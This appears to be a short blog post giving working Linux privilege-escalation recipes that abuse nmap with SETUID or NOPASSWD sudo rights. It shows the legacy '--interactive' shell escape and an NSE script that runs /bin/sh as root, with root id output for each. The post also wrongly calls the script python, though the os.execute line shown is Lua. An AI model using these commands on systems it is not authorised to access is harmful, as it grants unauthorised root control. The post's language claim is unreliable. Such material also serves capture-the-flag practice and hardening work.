Day 64: NMAP 2 ROOT FTW (with and without interactive mode)

int0x33
int0x33
Mar 4, 2019 · 1 min read
Image for post
Image for post

Today post is short but sweet. So you may have seen people using nmap to escalate priveledges on Linux, this happens when there are correct SETUID bits or in a condition where you can exploit NOPASSWD sudo permissions. It usually goes a little something like this…

nmap --interactive OR sudo nmap --interactivenmap> !sh
# id
uid=0(root) gid=0(root) groups=0(root)

This was fun for a long time and even better when CTFs use it as you can fly through the good ol’ nmap trick. But what about on newer versions where the interactive mode is not present. Do not fear, nmap script is here and ready to save the day.

echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

Since the script is python, get creative! Endless possibilities.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store